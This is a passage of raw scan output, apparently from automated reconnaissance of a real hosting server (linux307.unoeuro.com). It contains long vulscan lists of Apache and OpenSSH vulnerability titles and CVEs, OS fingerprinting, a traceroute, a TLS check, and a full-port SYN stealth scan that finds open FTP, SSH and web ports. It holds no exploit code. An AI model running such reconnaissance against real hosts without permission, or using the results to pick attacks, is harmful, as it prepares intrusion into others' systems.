6576| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
6577| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
6578| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
6579| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
6580| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
6581| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
6582| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
6583| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
6584| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
6585| [24365] Apache Struts Multiple Function Error Message XSS
6586| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
6587| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
6588| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
6589| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
6590| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
6591| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
6592| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
6593| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
6594| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
6595| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
6596| [22459] Apache Geronimo Error Page XSS
6597| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
6598| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
6599| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
6600| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
6601| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
6602| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
6603| [21021] Apache Struts Error Message XSS
6604| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
6605| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
6606| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
6607| [20439] Apache Tomcat Directory Listing Saturation DoS
6608| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
6609| [20285] Apache HTTP Server Log File Control Character Injection
6610| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
6611| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
6612| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
6613| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
6614| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
6615| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
6616| [19821] Apache Tomcat Malformed Post Request Information Disclosure
6617| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
6618| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
6619| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
6620| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
6621| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
6622| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
6623| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
6624| [18233] Apache HTTP Server htdigest user Variable Overfow
6625| [17738] Apache HTTP Server HTTP Request Smuggling
6626| [16586] Apache HTTP Server Win32 GET Overflow DoS
6627| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
6628| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
6629| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
6630| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
6631| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
6632| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
6633| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
6634| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
6635| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
6636| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
6637| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
6638| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
6639| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
6640| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
6641| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
6642| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
6643| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
6644| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
6645| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
6646| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
6647| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
6648| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
6649| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
6650| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
6651| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
6652| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
6653| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
6654| [13304] Apache Tomcat realPath.jsp Path Disclosure
6655| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
6656| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
6657| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
6658| [12848] Apache HTTP Server htdigest realm Variable Overflow
6659| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
6660| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
6661| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
6662| [12557] Apache HTTP Server prefork MPM accept Error DoS
6663| [12233] Apache Tomcat MS-DOS Device Name Request DoS
6664| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
6665| [12231] Apache Tomcat web.xml Arbitrary File Access
6666| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
6667| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
6668| [12178] Apache Jakarta Lucene results.jsp XSS
6669| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
6670| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
6671| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
6672| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
6673| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
6674| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
6675| [10471] Apache Xerces-C++ XML Parser DoS
6676| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
6677| [10068] Apache HTTP Server htpasswd Local Overflow
6678| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
6679| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
6680| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
6681| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
6682| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
6683| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
6684| [9717] Apache HTTP Server mod_cookies Cookie Overflow
6685| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
6686| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
6687| [9714] Apache Authentication Module Threaded MPM DoS
6688| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
6689| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
6690| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
6691| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
6692| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
6693| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
6694| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
6695| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
6696| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
6697| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
6698| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
6699| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
6700| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
6701| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
6702| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
6703| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
6704| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
6705| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
6706| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
6707| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
6708| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
6709| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
6710| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
6711| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
6712| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
6713| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
6714| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
6715| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
6716| [9208] Apache Tomcat .jsp Encoded Newline XSS
6717| [9204] Apache Tomcat ROOT Application XSS
6718| [9203] Apache Tomcat examples Application XSS
6719| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
6720| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
6721| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
6722| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
6723| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
6724| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
6725| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
6726| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
6727| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
6728| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
6729| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
6730| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
6731| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
6732| [7611] Apache HTTP Server mod_alias Local Overflow
6733| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
6734| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
6735| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
6736| [6882] Apache mod_python Malformed Query String Variant DoS
6737| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
6738| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
6739| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
6740| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
6741| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
6742| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
6743| [5526] Apache Tomcat Long .JSP URI Path Disclosure
6744| [5278] Apache Tomcat web.xml Restriction Bypass
6745| [5051] Apache Tomcat Null Character DoS
6746| [4973] Apache Tomcat servlet Mapping XSS
6747| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
6748| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
6749| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
6750| [4568] mod_survey For Apache ENV Tags SQL Injection
6751| [4553] Apache HTTP Server ApacheBench Overflow DoS
6752| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
6753| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
6754| [4383] Apache HTTP Server Socket Race Condition DoS
6755| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
6756| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
6757| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
6758| [4231] Apache Cocoon Error Page Server Path Disclosure
6759| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
6760| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
6761| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
6762| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
6763| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
6764| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
6765| [3322] mod_php for Apache HTTP Server Process Hijack
6766| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
6767| [2885] Apache mod_python Malformed Query String DoS
6768| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
6769| [2733] Apache HTTP Server mod_rewrite Local Overflow
6770| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
6771| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
6772| [2149] Apache::Gallery Privilege Escalation
6773| [2107] Apache HTTP Server mod_ssl Host: Header XSS
6774| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
6775| [1833] Apache HTTP Server Multiple Slash GET Request DoS
6776| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
6777| [872] Apache Tomcat Multiple Default Accounts
6778| [862] Apache HTTP Server SSI Error Page XSS
6779| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
6780| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
6781| [845] Apache Tomcat MSDOS Device XSS
6782| [844] Apache Tomcat Java Servlet Error Page XSS
6783| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
6784| [838] Apache HTTP Server Chunked Encoding Remote Overflow
6785| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
6786| [775] Apache mod_python Module Importing Privilege Function Execution
6787| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
6788| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
6789| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
6790| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
6791| [637] Apache HTTP Server UserDir Directive Username Enumeration
6792| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
6793| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
6794| [562] Apache HTTP Server mod_info /server-info Information Disclosure
6795| [561] Apache Web Servers mod_status /server-status Information Disclosure
6796| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
6797| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
6798| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
6799| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
6800| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
6801| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
6802| [376] Apache Tomcat contextAdmin Arbitrary File Access
6803| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
6804| [222] Apache HTTP Server test-cgi Arbitrary File Access
6805| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
6806| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
6807|_
6808Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
6809Device type: general purpose|firewall|storage-misc|VoIP phone
6810Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
6811OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
6812Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
6813No exact OS matches for host (test conditions non-ideal).
6814Uptime guess: 1.859 days (since Tue Jan 14 23:05:29 2020)
6815Network Distance: 14 hops
6816TCP Sequence Prediction: Difficulty=261 (Good luck!)
6817IP ID Sequence Generation: All zeros
6818
6819TRACEROUTE (using port 443/tcp)
6820HOP RTT ADDRESS
68211 389.15 ms 10.248.204.1
68222 389.22 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
68233 389.20 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
68244 389.31 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
68255 389.24 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
68266 389.30 ms bzq-219-189-78.cablep.bezeqint.net (62.219.189.78)
68277 389.34 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
68288 389.34 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
68299 389.39 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
683010 233.09 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
683111 322.11 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
683212 329.14 ms 212.237.248.7
683313 ...
683414 329.19 ms linux307.unoeuro.com (93.191.156.197)
6835
6836NSE: Script Post-scanning.
6837Initiating NSE at 19:41
6838Completed NSE at 19:41, 0.00s elapsed
6839Initiating NSE at 19:41
6840Completed NSE at 19:41, 0.00s elapsed
6841######################################################################################################################################
6842Version: 1.11.13-static
6843OpenSSL 1.0.2-chacha (1.0.2g-dev)
6844
6845Connected to 93.191.156.197
6846
6847Testing SSL server 93.191.156.197 on port 443 using SNI name 93.191.156.197
6848
6849 TLS Fallback SCSV:
6850Server supports TLS Fallback SCSV
6851
6852 TLS renegotiation:
6853Session renegotiation not supported
6854
6855 TLS Compression:
6856Compression disabled
6857
6858 Heartbleed:
6859TLS 1.2 not vulnerable to heartbleed
6860TLS 1.1 not vulnerable to heartbleed
6861TLS 1.0 not vulnerable to heartbleed
6862
6863 Supported Server Cipher(s):
6864Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
6865Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
6866Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
6867Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
6868
6869 SSL Certificate:
6870Signature Algorithm: sha256WithRSAEncryption
6871RSA Key Strength: 2048
6872
6873Subject: *.unoeuro.com
6874Altnames: DNS:*.unoeuro.com, DNS:unoeuro.com
6875Issuer: Sectigo RSA Domain Validation Secure Server CA
6876
6877Not valid before: Feb 6 00:00:00 2019 GMT
6878Not valid after: Feb 5 23:59:59 2021 GMT
6879######################################################################################################################################
6880Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:48 EST
6881NSE: Loaded 47 scripts for scanning.
6882NSE: Script Pre-scanning.
6883Initiating NSE at 19:48
6884Completed NSE at 19:48, 0.00s elapsed
6885Initiating NSE at 19:48
6886Completed NSE at 19:48, 0.00s elapsed
6887Initiating Parallel DNS resolution of 1 host. at 19:48
6888Completed Parallel DNS resolution of 1 host. at 19:48, 0.02s elapsed
6889Initiating SYN Stealth Scan at 19:48
6890Scanning linux307.unoeuro.com (93.191.156.197) [65535 ports]
6891Discovered open port 80/tcp on 93.191.156.197
6892Discovered open port 443/tcp on 93.191.156.197
6893Discovered open port 21/tcp on 93.191.156.197
6894Discovered open port 22/tcp on 93.191.156.197
6895SYN Stealth Scan Timing: About 3.05% done; ETC: 20:05 (0:16:26 remaining)
6896SYN Stealth Scan Timing: About 9.44% done; ETC: 19:58 (0:09:45 remaining)
6897SYN Stealth Scan Timing: About 15.69% done; ETC: 19:57 (0:08:09 remaining)
6898SYN Stealth Scan Timing: About 24.41% done; ETC: 19:58 (0:07:38 remaining)
6899SYN Stealth Scan Timing: About 29.63% done; ETC: 19:58 (0:07:03 remaining)
6900SYN Stealth Scan Timing: About 36.28% done; ETC: 19:57 (0:06:05 remaining)
6901SYN Stealth Scan Timing: About 42.70% done; ETC: 19:57 (0:05:35 remaining)
6902SYN Stealth Scan Timing: About 49.31% done; ETC: 19:58 (0:05:03 remaining)
6903SYN Stealth Scan Timing: About 54.73% done; ETC: 19:58 (0:04:29 remaining)
6904SYN Stealth Scan Timing: About 60.15% done; ETC: 19:58 (0:03:55 remaining)
6905SYN Stealth Scan Timing: About 67.23% done; ETC: 19:57 (0:03:08 remaining)
6906SYN Stealth Scan Timing: About 75.40% done; ETC: 19:57 (0:02:15 remaining)
6907SYN Stealth Scan Timing: About 83.83% done; ETC: 19:57 (0:01:26 remaining)
6908SYN Stealth Scan Timing: About 92.90% done; ETC: 19:56 (0:00:36 remaining)
6909Completed SYN Stealth Scan at 19:56, 492.14s elapsed (65535 total ports)
6910Initiating Service scan at 19:56
6911Scanning 4 services on linux307.unoeuro.com (93.191.156.197)
6912Completed Service scan at 19:56, 14.04s elapsed (4 services on 1 host)
6913Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
6914Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
6915Initiating Traceroute at 19:56
6916Completed Traceroute at 19:56, 3.23s elapsed
6917Initiating Parallel DNS resolution of 12 hosts. at 19:56
6918Completed Parallel DNS resolution of 12 hosts. at 19:56, 0.62s elapsed
6919NSE: Script scanning 93.191.156.197.
6920Initiating NSE at 19:56
6921Completed NSE at 19:56, 10.73s elapsed
6922Initiating NSE at 19:56
6923Completed NSE at 19:57, 3.42s elapsed
6924Nmap scan report for linux307.unoeuro.com (93.191.156.197)
6925Host is up (0.35s latency).
6926Not shown: 65525 filtered ports
6927PORT STATE SERVICE VERSION
692820/tcp closed ftp-data
692921/tcp open tcpwrapped
693022/tcp open ssh OpenSSH 5.3 (protocol 2.0)
6931| vulners:
6932| cpe:/a:openbsd:openssh:5.3:
6933| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
6934| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
6935| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
6936| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
6937| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
6938| CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
6939| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
6940| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
6941| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
6942|_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
6943| vulscan: VulDB - https://vuldb.com:
6944| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
6945| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
6946| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
6947| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
6948|
6949| MITRE CVE - https://cve.mitre.org:
6950| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
6951| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
6952| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
6953| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
6954| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
6955| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
6956| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
6957| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
6958| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
6959|
6960| SecurityFocus - https://www.securityfocus.com/bid/:
6961| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
6962| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
6963| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
6964| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
6965| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
6966| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
6967| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
6968| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
6969| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
6970| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
6971| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
6972| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
6973| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
6974| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
6975| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
6976| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
6977| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
6978| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
6979| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
6980| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
6981| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
6982| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
6983| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
6984| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
6985| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
6986| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
6987| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
6988| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
6989| [75990] OpenSSH Login Handling Security Bypass Weakness
6990| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
6991| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
